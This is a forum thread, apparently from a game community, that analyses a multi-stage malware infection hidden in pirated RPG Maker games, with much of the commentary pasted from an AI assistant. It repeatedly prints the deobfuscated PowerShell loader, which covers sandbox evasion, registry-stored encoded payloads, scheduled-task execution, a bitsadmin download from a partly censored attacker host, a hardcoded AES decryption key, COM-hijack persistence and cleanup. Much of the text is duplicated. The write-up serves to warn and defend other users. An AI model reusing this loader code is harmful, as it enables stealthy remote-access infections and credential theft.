$hStr = $f1.ToString("HH:mm", [System.Globalization.CultureInfo]::InvariantCulture)
$argts = "/create /f /sc once /st $hStr /sd $f1Str /tn `"$ups`" /tr `"$arg1`""
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "schtasks"
$psi.Arguments = $argts
$psi.UseShellExecute = $false
$psi.CreateNoWindow = $true
$p5 = [System.Diagnostics.Process]::Start($psi)
$p5.WaitForExit()
}
Some variables of the code are in spanish, like subcarpetas (subfolders) and letras (letters), in this code theres a part of it which is also encrypted, if we decrypt it with the same method as before, we get this:
$ErrorActionPreference = "SilentlyContinue"
$y = (Get-ItemProperty "HKCU:\Environment").MI_V2
$o = $y
$f = (Split-Path $y -Parent) + '\'
$i = Join-Path -Path $f -ChildPath "settings.dat"
$i2 = Join-Path -Path $f -ChildPath "1.bak"
//i will censor the website because of the rules, if admins think it's too exposed, feel free to edit my post
$arg = "/transfer","md","https://mgz.great-s***.n**/zaesd.jpg",$i2
$pr = Start-Process -FilePath "bitsadmin.exe" `
-ArgumentList $arg `
-WindowStyle Hidden `
-Wait `
-PassThru
Start-Sleep -Seconds 30
Copy-Item -Path $i2 -Destination $i
Remove-Item -Path $i2
Start-Sleep -Seconds 1
$a = [System.Security.Cryptography.Aes]::Create()
$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
$a.IV = $a.Key
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$d = $a.CreateDecryptor()
$e = [IO.File]::ReadAllBytes($i)
$ds = $d.TransformFinalBlock($e, 0, $e.Length)
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$rand = New-Object byte[] 2
$rng.GetBytes($rand)
$ds[$ds.Length - 2] = $rand[0]
$ds[$ds.Length - 1] = $rand[1]
[IO.File]::WriteAllBytes($o, $ds)
Remove-Item -Path $i
$c = "{B210D694-C0DF-490D-9576-9E20CDBC20BD}"
$p2 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"
New-Item -Path $p2 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
Set-ItemProperty -Path $p2 `
-Name "(Default)" `
-Value $o `
-Type String
$c = "{DDAFAEA2-8842-4E96-BADE-D44A0D676FDB}"
$p3 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"
New-Item -Path $p3 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
Set-ItemProperty -Path $p3 `
-Name "(Default)" `
-Value $o `
-Type String
Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V" -ErrorAction SilentlyContinue | Out-Null
Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V2" -ErrorAction SilentlyContinue | Out-Null
Unregister-ScheduledTask -TaskName "update-systask" -Confirm:$false -ErrorAction SilentlyContinue | Out-Null
$arg = "/S","/C","{B210D694-C0DF-490D-9576-9E20CDBC20BD}"
$pr = Start-Process -FilePath "verclsid.exe" `
-ArgumentList $arg `
-WindowStyle Hidden
$y = (Get-ItemProperty "HKCU:\Environment").MI_V2
$o = $y
$f = (Split-Path $y -Parent) + '\'
$i = Join-Path -Path $f -ChildPath "settings.dat"
$i2 = Join-Path -Path $f -ChildPath "1.bak"
//i will censor the website because of the rules, if admins think it's too exposed, feel free to edit my post
$arg = "/transfer","md","https://mgz.great-s***.n**/zaesd.jpg",$i2
$pr = Start-Process -FilePath "bitsadmin.exe" `
-ArgumentList $arg `
-WindowStyle Hidden `
-Wait `
-PassThru
Start-Sleep -Seconds 30
Copy-Item -Path $i2 -Destination $i
Remove-Item -Path $i2
Start-Sleep -Seconds 1
$a = [System.Security.Cryptography.Aes]::Create()
$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
$a.IV = $a.Key
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$d = $a.CreateDecryptor()
$e = [IO.File]::ReadAllBytes($i)
$ds = $d.TransformFinalBlock($e, 0, $e.Length)
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$rand = New-Object byte[] 2
$rng.GetBytes($rand)
$ds[$ds.Length - 2] = $rand[0]
$ds[$ds.Length - 1] = $rand[1]
[IO.File]::WriteAllBytes($o, $ds)
Remove-Item -Path $i
$c = "{B210D694-C0DF-490D-9576-9E20CDBC20BD}"
$p2 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"
New-Item -Path $p2 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
Set-ItemProperty -Path $p2 `
-Name "(Default)" `
-Value $o `
-Type String
$c = "{DDAFAEA2-8842-4E96-BADE-D44A0D676FDB}"
$p3 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"
New-Item -Path $p3 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
Set-ItemProperty -Path $p3 `
-Name "(Default)" `
-Value $o `
-Type String
Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V" -ErrorAction SilentlyContinue | Out-Null
Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V2" -ErrorAction SilentlyContinue | Out-Null
Unregister-ScheduledTask -TaskName "update-systask" -Confirm:$false -ErrorAction SilentlyContinue | Out-Null
$arg = "/S","/C","{B210D694-C0DF-490D-9576-9E20CDBC20BD}"
$pr = Start-Process -FilePath "verclsid.exe" `
-ArgumentList $arg `
-WindowStyle Hidden
AI explanation about the malware script:
# ============================================================
# GLOBAL SETTINGS
# ============================================================
$ErrorActionPreference = "SilentlyContinue"
# → Suppresses all errors (stealth, avoids alerts/logs)
# ============================================================
# ANTI-ANALYSIS (SANDBOX / TOOLS DETECTION)
# ============================================================
$ser = Get-Service -Name "SbieSvc" -ErrorAction SilentlyContinue
if ($ser) { return }
# → Detects Sandboxie (common malware sandbox)
$proc = Get-Process -Name "Procmon64" -ErrorAction SilentlyContinue
if ($proc) { return }
# → Detects Process Monitor (used by analysts)
$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {
# → Only continue if Sandboxie is NOT installed
# ============================================================
# RANDOMIZATION (ANTI-DETECTION)
# ============================================================
$d2 = ".dll"
$letras = "abcdefghijklmnopqrstuvwxyz"
$rnd = New-Object System.Random
function New-RandomString($len) {
$sb = New-Object System.Text.StringBuilder $len
for ($i = 0; $i -lt $len; $i++) {
$index = $rnd.Next(0, $letras.Length)
[void]$sb.Append($letras[$index])
}
return $sb.ToString()
}
$palabra1 = (New-RandomString 6) + $d2
$palabra2 = (New-RandomString 6) + $d2
# → Generates random DLL names (evasion)
$appDataLocal = [Environment]::GetFolderPath([Environment+SpecialFolder]::LocalApplicationData)
$subcarpetas = Get-ChildItem $appDataLocal -Directory | Select-Object -ExpandProperty FullName
function Get-RandomFolder {
do {
$p = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
} while ($p.Contains(" ") -or $p.Contains("History"))
return $p
}
$folderPath = Get-RandomFolder
$folderPath2 = Get-RandomFolder
$folderPath3 = Get-RandomFolder
# → Chooses random folders in AppData\Local
# ============================================================
# REGISTRY CHECK (ANTI-REINFECTION)
# ============================================================
$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'
$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
[Microsoft.Win32.RegistryHive]::CurrentUser,
[Microsoft.Win32.RegistryView]::Registry64
)
$text5 = [System.IO.Path]::Combine($folderPath2, $palabra1)
$key2 = $baseKey.OpenSubKey($rt2)
if ($key2 -ne $null) { return }
# → If already installed, exit
# ============================================================
# STAGE 2 PAYLOAD (OBFUSCATED)
# ============================================================
$UTEXT = "BASE64_ENCODED_POWERSHELL_PAYLOAD"
# → HUGE Base64 blob (UTF-16 PowerShell script)
# ============================================================
# STORE PAYLOAD IN REGISTRY (FILELESS TECHNIQUE)
# ============================================================
$envKey = 'HKCU:\Environment'
$myvar = 'MI_V'
$myvar2 = 'MI_V2'
if (Test-Path $envKey) {
Set-ItemProperty -Path $envKey -Name $myvar -Value $UTEXT -Type String
Set-ItemProperty -Path $envKey -Name $myvar2 -Value $text5 -Type String
}
# → Stores:
# MI_V = encoded script
# MI_V2 = output file path
# ============================================================
#
SCHEDULED TASK (DELAYED EXECUTION)
# ============================================================
$ups="update-systask"
$arg1 = "cmd.exe /c start '' /b powershell -NoProfile -WindowStyle Hidden -EncodedCommand %MI_V%";
# → Executes encoded payload later
$f1 = (Get-Date).AddDays(1)
$f1Str = $f1.ToString("dd/MM/yyyy")
$hStr = $f1.ToString("HH:mm")
$argts = "/create /f /sc once /st $hStr /sd $f1Str /tn `"$ups`" /tr `"$arg1`""
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "schtasks"
$psi.Arguments = $argts
$psi.UseShellExecute = $false
$psi.CreateNoWindow = $true
$p5 = [System.Diagnostics.Process]::Start($psi)
$p5.WaitForExit()
# → Creates scheduled task (runs next day)
# ============================================================
# SECOND STAGE (DECODED FROM $UTEXT)
# ============================================================
# (This is what gets executed later)
# --- DOWNLOAD ENCRYPTED PAYLOAD ---
//i censored the website
bitsadmin.exe /transfer md https://mgz.great-s***.n**/zaesd.jpg 1.bak
# --- MOVE FILE ---
Copy-Item 1.bak → settings.dat
# ============================================================
# ENCRYPTED PAYLOAD HANDLING (CORE SECTION)
# ============================================================
$a = [System.Security.Cryptography.Aes]::Create()
$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
# Hardcoded AES key
$a.IV = $a.Key
# ⚠ IV = key
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$d = $a.CreateDecryptor()
$e = [IO.File]::ReadAllBytes($i)
# → Read encrypted .jpg
$ds = $d.TransformFinalBlock($e, 0, $e.Length)
# DECRYPT → malware binary
# ============================================================
# END OF ENCRYPTED SECTION
# ============================================================
# ============================================================
# ANTI-SIGNATURE MUTATION
# ============================================================
$ds[$ds.Length - 2] = random
$ds[$ds.Length - 1] = random
# → Changes hash each run
# ============================================================
# WRITE FINAL MALWARE
# ============================================================
[IO.File]::WriteAllBytes($o, $ds)
# → Drops decrypted payload (DLL)
# ============================================================
# PERSISTENCE (COM HIJACKING)
# ============================================================
HKCU:\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32 → malicious DLL
# → Forces Windows to load attacker DLL
# ============================================================
# EXECUTION (LIVING-OFF-THE-LAND)
# ============================================================
verclsid.exe /S /C {GUID}
# → Executes DLL via trusted Windows binary
# ============================================================
# CLEANUP (ANTI-FORENSICS)
# ============================================================
Remove registry keys (MI_V, MI_V2)
Delete scheduled task
# → Removes evidence
# GLOBAL SETTINGS
# ============================================================
$ErrorActionPreference = "SilentlyContinue"
# → Suppresses all errors (stealth, avoids alerts/logs)
# ============================================================
# ANTI-ANALYSIS (SANDBOX / TOOLS DETECTION)
# ============================================================
$ser = Get-Service -Name "SbieSvc" -ErrorAction SilentlyContinue
if ($ser) { return }
# → Detects Sandboxie (common malware sandbox)
$proc = Get-Process -Name "Procmon64" -ErrorAction SilentlyContinue
if ($proc) { return }
# → Detects Process Monitor (used by analysts)
$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {
# → Only continue if Sandboxie is NOT installed
# ============================================================
# RANDOMIZATION (ANTI-DETECTION)
# ============================================================
$d2 = ".dll"
$letras = "abcdefghijklmnopqrstuvwxyz"
$rnd = New-Object System.Random
function New-RandomString($len) {
$sb = New-Object System.Text.StringBuilder $len
for ($i = 0; $i -lt $len; $i++) {
$index = $rnd.Next(0, $letras.Length)
[void]$sb.Append($letras[$index])
}
return $sb.ToString()
}
$palabra1 = (New-RandomString 6) + $d2
$palabra2 = (New-RandomString 6) + $d2
# → Generates random DLL names (evasion)
$appDataLocal = [Environment]::GetFolderPath([Environment+SpecialFolder]::LocalApplicationData)
$subcarpetas = Get-ChildItem $appDataLocal -Directory | Select-Object -ExpandProperty FullName
function Get-RandomFolder {
do {
$p = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
} while ($p.Contains(" ") -or $p.Contains("History"))
return $p
}
$folderPath = Get-RandomFolder
$folderPath2 = Get-RandomFolder
$folderPath3 = Get-RandomFolder
# → Chooses random folders in AppData\Local
# ============================================================
# REGISTRY CHECK (ANTI-REINFECTION)
# ============================================================
$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'
$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
[Microsoft.Win32.RegistryHive]::CurrentUser,
[Microsoft.Win32.RegistryView]::Registry64
)
$text5 = [System.IO.Path]::Combine($folderPath2, $palabra1)
$key2 = $baseKey.OpenSubKey($rt2)
if ($key2 -ne $null) { return }
# → If already installed, exit
# ============================================================
# STAGE 2 PAYLOAD (OBFUSCATED)
# ============================================================
$UTEXT = "BASE64_ENCODED_POWERSHELL_PAYLOAD"
# → HUGE Base64 blob (UTF-16 PowerShell script)
# ============================================================
# STORE PAYLOAD IN REGISTRY (FILELESS TECHNIQUE)
# ============================================================
$envKey = 'HKCU:\Environment'
$myvar = 'MI_V'
$myvar2 = 'MI_V2'
if (Test-Path $envKey) {
Set-ItemProperty -Path $envKey -Name $myvar -Value $UTEXT -Type String
Set-ItemProperty -Path $envKey -Name $myvar2 -Value $text5 -Type String
}
# → Stores:
# MI_V = encoded script
# MI_V2 = output file path
# ============================================================
#
SCHEDULED TASK (DELAYED EXECUTION)# ============================================================
$ups="update-systask"
$arg1 = "cmd.exe /c start '' /b powershell -NoProfile -WindowStyle Hidden -EncodedCommand %MI_V%";
# → Executes encoded payload later
$f1 = (Get-Date).AddDays(1)
$f1Str = $f1.ToString("dd/MM/yyyy")
$hStr = $f1.ToString("HH:mm")
$argts = "/create /f /sc once /st $hStr /sd $f1Str /tn `"$ups`" /tr `"$arg1`""
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "schtasks"
$psi.Arguments = $argts
$psi.UseShellExecute = $false
$psi.CreateNoWindow = $true
$p5 = [System.Diagnostics.Process]::Start($psi)
$p5.WaitForExit()
# → Creates scheduled task (runs next day)
# ============================================================
# SECOND STAGE (DECODED FROM $UTEXT)
# ============================================================
# (This is what gets executed later)
# --- DOWNLOAD ENCRYPTED PAYLOAD ---
//i censored the website
bitsadmin.exe /transfer md https://mgz.great-s***.n**/zaesd.jpg 1.bak
# --- MOVE FILE ---
Copy-Item 1.bak → settings.dat
# ============================================================
# ENCRYPTED PAYLOAD HANDLING (CORE SECTION)
# ============================================================
$a = [System.Security.Cryptography.Aes]::Create()
$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
# Hardcoded AES key
$a.IV = $a.Key
# ⚠ IV = key
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$d = $a.CreateDecryptor()
$e = [IO.File]::ReadAllBytes($i)
# → Read encrypted .jpg
$ds = $d.TransformFinalBlock($e, 0, $e.Length)
# DECRYPT → malware binary
# ============================================================
# END OF ENCRYPTED SECTION
# ============================================================
# ============================================================
# ANTI-SIGNATURE MUTATION
# ============================================================
$ds[$ds.Length - 2] = random
$ds[$ds.Length - 1] = random
# → Changes hash each run
# ============================================================
# WRITE FINAL MALWARE
# ============================================================
[IO.File]::WriteAllBytes($o, $ds)
# → Drops decrypted payload (DLL)
# ============================================================
# PERSISTENCE (COM HIJACKING)
# ============================================================
HKCU:\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32 → malicious DLL
# → Forces Windows to load attacker DLL
# ============================================================
# EXECUTION (LIVING-OFF-THE-LAND)
# ============================================================
verclsid.exe /S /C {GUID}
# → Executes DLL via trusted Windows binary
# ============================================================
# CLEANUP (ANTI-FORENSICS)
# ============================================================
Remove registry keys (MI_V, MI_V2)
Delete scheduled task
# → Removes evidence
I will post the AI full explanation about the first part of this malware script:
HIGH-LEVEL OVERVIEW
This script is a:
Full flow:
1. ANTI-ANALYSIS / SANDBOX DETECTION
$ser = Get-Service -Name "SbieSvc"
if ($ser) {return}Detects Sandboxie (common malware analysis sandbox)
$proc = Get-Process -Name "Procmon64"
if ($proc) { return }Detects Process Monitor (used by analysts)
$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {If Sandboxie folder exists → exit
Otherwise → continue execution
Purpose
Avoid execution in:
- sandboxes
- malware labs
- analyst environments
2. RANDOMIZATION (ANTI-DETECTION)
function New-RandomString($len) { ... }
$palabra1 = (New-RandomString 6) + ".dll"
$palabra2 = (New-RandomString 6) + ".dll"Generates random DLL names like:
xkqplm.dll
ztrwqa.dll$appDataLocal = [Environment]::GetFolderPath(...)
$subcarpetas = Get-ChildItem $appDataLocal -DirectoryGets all folders in:
C:\Users\<user>\AppData\Local\function Get-RandomFolder { ... }Picks random folders excluding:
- spaces
- "History"
Purpose
3. REGISTRY PRE-CHECK (ANTI-REINFECTION)
$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'
$key2 = $baseKey.OpenSubKey($rt2)
if ($key2 -ne $null) { return }If registry key exists → malware already installed → exit
Purpose
4. STORED PAYLOAD (OBFUSCATED)
$UTEXT = "DQAKACQARQByAHIAbwByA..."This is:
Set-ItemProperty HKCU:\Environment MI_V = $UTEXT
Set-ItemProperty HKCU:\Environment MI_V2 = $text5Stores:
- encoded script
- output file path
Purpose
5. DELAYED EXECUTION (SCHEDULED TASK)$arg1 = "powershell ... -EncodedCommand %MI_V%"Executes encoded payload later
schtasks /create ...
Creates scheduled task:
update-systask
Runs next day
Purpose
6. SECOND STAGE EXECUTION
When task runs:
powershell -EncodedCommand %MI_V%This decodes and executes the $UTEXT payload
7. ENCRYPTED PAYLOAD SECTION (IMPORTANT)
Inside decoded $UTEXT:THIS IS THE ENCRYPTED PART
$a = [System.Security.Cryptography.Aes]::Create()
$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
$a.IV = $a.Key
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$d = $a.CreateDecryptor()
$e = [IO.File]::ReadAllBytes($i)
$ds = $d.TransformFinalBlock($e, 0, $e.Length)What happens here
| Step | Meaning |
|---|---|
| AES Create | Initializes crypto |
| Key | "zbcd1j9234r670eh" |
| IV | Same as key |
| Read file | encrypted .jpg |
| Decrypt | produces malware binary |
BEFORE THIS (setup)
bitsadmin.exe https://.../zaesd.jpgDownloads encrypted payload
AFTER THIS (execution)
WriteAllBytes($o, $ds)Writes decrypted malware
8. ANTI-SIGNATURE MODIFICATION
$ds[$ds.Length - 2] = random
$ds[$ds.Length - 1] = randomCorrupts last 2 bytes
Purpose
9. PERSISTENCE (COM HIJACKING)
HKCU:\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32Points CLSID to malicious DLL
Purpose
10. EXECUTION
verclsid.exe /S /C {GUID}Loads malicious DLL indirectly
Purpose
(Living-off-the-land)
11. CLEANUP
Remove-ItemProperty HKCU:\Environment MI_V / MI_V2
Unregister-ScheduledTask update-systask
Purpose
FINAL CLASSIFICATION
This malware uses:
Encryption
- AES-CBC (payload protection)
- Base64 (PowerShell stage)
- Sandbox detection
- Delayed execution
- Randomized paths
- COM hijacking
- Cleanup
- Binary mutation
FINAL TAKEAWAY
The script is multi-stage malware loader
- Stage 1: this script (setup + evasion)
- Stage 2: encoded PowerShell (registry)
- Stage 3: encrypted payload (AES)
- Stage 4: DLL execution via COM hijack
This is only the first part of the malware.
PART 1.5 (zaesd.jpg downloaded from the powershell script inside Scene2.ogg):
The second part involves it downloading a infected .jpg file (zaesd.jpg) which i renamed as .bin for safety purposes, the website it downloads from (mgz.great-s***.n** censored for safety) visually looks like a very weird porn/porn game website, containing background porn images, a ton of popups and ads, aswell as a list of porn games. The title of this website is "Gallery unlocked games", if we view the source code of the page, it also has some spanish variables, also has a contact email (meg*s****.x.00*@gmail.c** censored for safety):
Continues in the next post..
PART 1.9 Update
Last edited:
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
Another linked website in the source code:
The list of games it has is also clickable, i couldn't click any because it is full of ads, but checking the source code reveals a huge list of pixeldrain links with the games (most probably infected)
The worst part? it has 300+ possibly infected pixeldrain links:
So, visiting the image the powershell script was running leads to a blank page with an error saying the .jpg was unable to load (fake .jpg is a malware), after downloading the file, the scan didn't trigger any of the AVs (yet).
https://www.virustotal.com/gui/file/faf27ed1af822fe8816c75e172a0c315056ac2f71c7e624a6d26e70d706b1af4 zaesd.jpg file (renamed as .bin for safety)
So after we decrypt this file (AES-CBC payload decryption using the same key as before "
https://www.virustotal.com/gui/file...836d833c2118afab7faefccaadb746d41e1/detection decrypted zaesd.jpg (renamed as .bin for safety)
https://hybrid-analysis.com/sample/4be40152d1b0b0a9dba5fd70f6234836d833c2118afab7faefccaadb746d41e1
If i manage to reverse engineer this file, i will post a part 2 of this analysis, sorry for the AI text, i felt the need to do this analysis ASAP.
If a admin or anyone wants the files for a more in depth analysis i still have them, just DM me.
Also i saved the raw source code of the infected page url containing all the 300+ pixeldrain links, just contact me.
TLDR: The infected RPGM games contains a infected game.exe and a random fake file (disguised as .ogg, .js or any kind of file) which runs a very powerful powershell script which verifies for sandbox, process monitor (avoids running if detects them), generates random .dll or folders, stores a encrypted powershell script and delays it 1 day later so it activates.
The script then downloads a infected fake .jpg file from a very suspiscious website which there are 300+ pixeldrain game links that are most possibly infected. This file when decrypted, reveals a malware infected file.
Summary details from AI report:
My recommendation: I recommend avoid downloading pixeldrain games for now, specially uploads from new users, because of the 300+ links i found in the malware website.
This is the last part of my post on f95 for now.
PART 1.9 Update
The list of games it has is also clickable, i couldn't click any because it is full of ads, but checking the source code reveals a huge list of pixeldrain links with the games (most probably infected)
The worst part? it has 300+ possibly infected pixeldrain links:
So, visiting the image the powershell script was running leads to a blank page with an error saying the .jpg was unable to load (fake .jpg is a malware), after downloading the file, the scan didn't trigger any of the AVs (yet).
https://www.virustotal.com/gui/file/faf27ed1af822fe8816c75e172a0c315056ac2f71c7e624a6d26e70d706b1af4 zaesd.jpg file (renamed as .bin for safety)
So after we decrypt this file (AES-CBC payload decryption using the same key as before "
zbcd1j9234r670eh"), we finally get a decrypted and infected malware file from our fake .jpg which was downloaded from the fake .ogg:https://www.virustotal.com/gui/file...836d833c2118afab7faefccaadb746d41e1/detection decrypted zaesd.jpg (renamed as .bin for safety)
https://hybrid-analysis.com/sample/4be40152d1b0b0a9dba5fd70f6234836d833c2118afab7faefccaadb746d41e1
If i manage to reverse engineer this file, i will post a part 2 of this analysis, sorry for the AI text, i felt the need to do this analysis ASAP.
If a admin or anyone wants the files for a more in depth analysis i still have them, just DM me.
Also i saved the raw source code of the infected page url containing all the 300+ pixeldrain links, just contact me.
TLDR: The infected RPGM games contains a infected game.exe and a random fake file (disguised as .ogg, .js or any kind of file) which runs a very powerful powershell script which verifies for sandbox, process monitor (avoids running if detects them), generates random .dll or folders, stores a encrypted powershell script and delays it 1 day later so it activates.
The script then downloads a infected fake .jpg file from a very suspiscious website which there are 300+ pixeldrain game links that are most possibly infected. This file when decrypted, reveals a malware infected file.
Summary details from AI report:
Here's a clean, high-level summary of what the PowerShell script does, plus what we can infer about the decrypted zaesd payload.
PowerShell Malware — Behavior Summary
1. Environment & Anti-Analysis Checks
Silences errors to avoid visibility
Checks for analysis tools:
Sandboxie service
Procmon (Process Monitor)
If detected → stops execution immediately
Goal: avoid sandboxes and researchers
2. Randomization (Evasion)
Generates random names for:
DLL files
folders in AppData\Local
Avoids folders with spaces or suspicious names
Goal: make detection and signatures harder
3. Persistence Check
Looks for a specific registry CLSID key
If it already exists → exits
Prevents reinfection / duplicate installs
4. Fileless Payload Storage
Stores a Base64-encoded PowerShell script in:
HKCU:\Environment → MI_V
Stores execution path in:
MI_V2
This avoids writing the payload to disk initially
5. Delayed Execution (Stealth)
Creates a scheduled task
Executes 1 day later
Runs:
powershell -EncodedCommand %MI_V%
Helps bypass behavioral detection systems
6. Second Stage (Executed Later)
Download
Uses bitsadmin to download:
https://mgz.great-s***.n**/zaesd.jpg
Saves it disguised as .jpg
Actually not an image
7. Decryption (Critical Step)
Reads downloaded file
Decrypts using:
Parameter Value
Algorithm AES
Mode CBC
Key zbcd1j9234r670eh
IV same as key
Produces the real malware binary
8. Anti-Detection Mutation
Modifies last 2 bytes randomly
Changes file hash every execution
9. Payload Drop
Writes decrypted content as a DLL file
Saves in random AppData folder
10. Persistence (Advanced)
Uses COM Hijacking
Writes malicious DLL path into:
HKCU\SOFTWARE\Classes\CLSID\{GUID}
Forces Windows to load attacker DLL
11. Execution
Executes via:
verclsid.exe
Legit Windows binary (LOLBIN technique)
12. Cleanup
Deletes:
registry payload
scheduled task
Removes traces after execution
Decrypted zaesd Payload — What We Know
Even without full dynamic execution, based on structure:
Type
DLL (Windows PE file)
Likely compiled (C/C++ or .NET)
⚙ Behavior Indicators
From the loader design, this payload is likely:
A loader / stager
May download additional malware
Could act as entry point for larger infection chain
Possible capabilities
Command & Control (C2 communication)
Data exfiltration
Keylogging / credential theft
Process injection
PowerShell Malware — Behavior Summary
1. Environment & Anti-Analysis Checks
Silences errors to avoid visibility
Checks for analysis tools:
Sandboxie service
Procmon (Process Monitor)
If detected → stops execution immediately
Goal: avoid sandboxes and researchers
2. Randomization (Evasion)
Generates random names for:
DLL files
folders in AppData\Local
Avoids folders with spaces or suspicious names
Goal: make detection and signatures harder
3. Persistence Check
Looks for a specific registry CLSID key
If it already exists → exits
Prevents reinfection / duplicate installs
4. Fileless Payload Storage
Stores a Base64-encoded PowerShell script in:
HKCU:\Environment → MI_V
Stores execution path in:
MI_V2
This avoids writing the payload to disk initially
5. Delayed Execution (Stealth)
Creates a scheduled task
Executes 1 day later
Runs:
powershell -EncodedCommand %MI_V%
Helps bypass behavioral detection systems
6. Second Stage (Executed Later)
Download
Uses bitsadmin to download:
https://mgz.great-s***.n**/zaesd.jpg
Saves it disguised as .jpg
Actually not an image
7. Decryption (Critical Step)
Reads downloaded file
Decrypts using:
Parameter Value
Algorithm AES
Mode CBC
Key zbcd1j9234r670eh
IV same as key
Produces the real malware binary
8. Anti-Detection Mutation
Modifies last 2 bytes randomly
Changes file hash every execution
9. Payload Drop
Writes decrypted content as a DLL file
Saves in random AppData folder
10. Persistence (Advanced)
Uses COM Hijacking
Writes malicious DLL path into:
HKCU\SOFTWARE\Classes\CLSID\{GUID}
Forces Windows to load attacker DLL
11. Execution
Executes via:
verclsid.exe
Legit Windows binary (LOLBIN technique)
12. Cleanup
Deletes:
registry payload
scheduled task
Removes traces after execution
Decrypted zaesd Payload — What We Know
Even without full dynamic execution, based on structure:
Type
DLL (Windows PE file)
Likely compiled (C/C++ or .NET)
⚙ Behavior Indicators
From the loader design, this payload is likely:
A loader / stager
May download additional malware
Could act as entry point for larger infection chain
Possible capabilities
Command & Control (C2 communication)
Data exfiltration
Keylogging / credential theft
Process injection
My recommendation: I recommend avoid downloading pixeldrain games for now, specially uploads from new users, because of the 300+ links i found in the malware website.
This is the last part of my post on f95 for now.
PART 1.9 Update
Last edited:
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
Update: I found in the Game.exe where it runs the Scene2.ogg (sideloads as .dll):
https://www.virustotal.com/gui/file/34715108991666034d8cc5b1e8a6715570de9d501f9be379ca62d65ae3244f17
https://hybrid-analysis.com/sample/34715108991666034d8cc5b1e8a6715570de9d501f9be379ca62d65ae3244f17 (renamed to game.bin for safety)
PART 1.9 Update
https://www.virustotal.com/gui/file/34715108991666034d8cc5b1e8a6715570de9d501f9be379ca62d65ae3244f17
https://hybrid-analysis.com/sample/34715108991666034d8cc5b1e8a6715570de9d501f9be379ca62d65ae3244f17 (renamed to game.bin for safety)
PART 1.9 Update
Last edited:
Please check user leo0083, as I'm fairly certain he sent the malicious code into the game file.
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
Quick update: i'm still analysing the second part of the infection, but found some interesting info:
FIRST PART
PART 1.9 (decrypted zaesd.jpg):
creates a Teams/TM folder containing a .log file..
Apparently it has a ignore filter for chinese language systems? (I think maybe its because of the recent chinese analysis another malware had, not sure) but the source of the virus doesn't look chinese (spanish variables in the powershell script), i will post more info later.
creates temp files:
IMPORTANT:
it has a C2 link, so it is a RAT with backdoor/keylogger.
AI quick analysis:
TLDR: It is a multi-function RAT that includes backdoor + keylogger behavior.
I will continue my analysis to see what else it does, or see what else can i find.
UPDATE (New info):
SUMMARY:
It is a:
Multi-stage, stealth RAT with:
FIRST PART
PART 1.9 (decrypted zaesd.jpg):
creates a Teams/TM folder containing a .log file..
Apparently it has a ignore filter for chinese language systems? (I think maybe its because of the recent chinese analysis another malware had, not sure) but the source of the virus doesn't look chinese (spanish variables in the powershell script), i will post more info later.
creates temp files:
IMPORTANT:
it has a C2 link, so it is a RAT with backdoor/keylogger.
AI quick analysis:
This is a full-featured RAT with keylogging
Confirmed capabilities:
️ Surveillance
File system
Network / C2
⚙ Execution
️ Evasion
"What is this file?"
"What does it do?"
In plain terms:
Confirmed capabilities:
️ Surveillance
Keylogging (keyboard + mouse)- User identification (USERNAME)
File system
- Creates hidden directories (Teams\TM)
- Writes logs (.log)
- Uses temp files for staging
Network / C2
- Connects to:
a*****.freeddns.o--
- Receives tasks/commands
⚙ Execution
- Executes commands (task, open, & Exit)
- Loads modules dynamically (LoadLibraryA earlier)
️ Evasion
- Region filtering (zh-CN, ignorelist domain)
- Disguised file/folder names
- Staged payload delivery
"What is this file?" "What does it do?"In plain terms:
- Infects the system via staged download
- Connects to attacker server
- Logs user input (keyboard + mouse)
- Stores logs locally (disguised as Teams data)
- Executes commands sent remotely
- Can manipulate files and processes
- Likely exfiltrates collected data
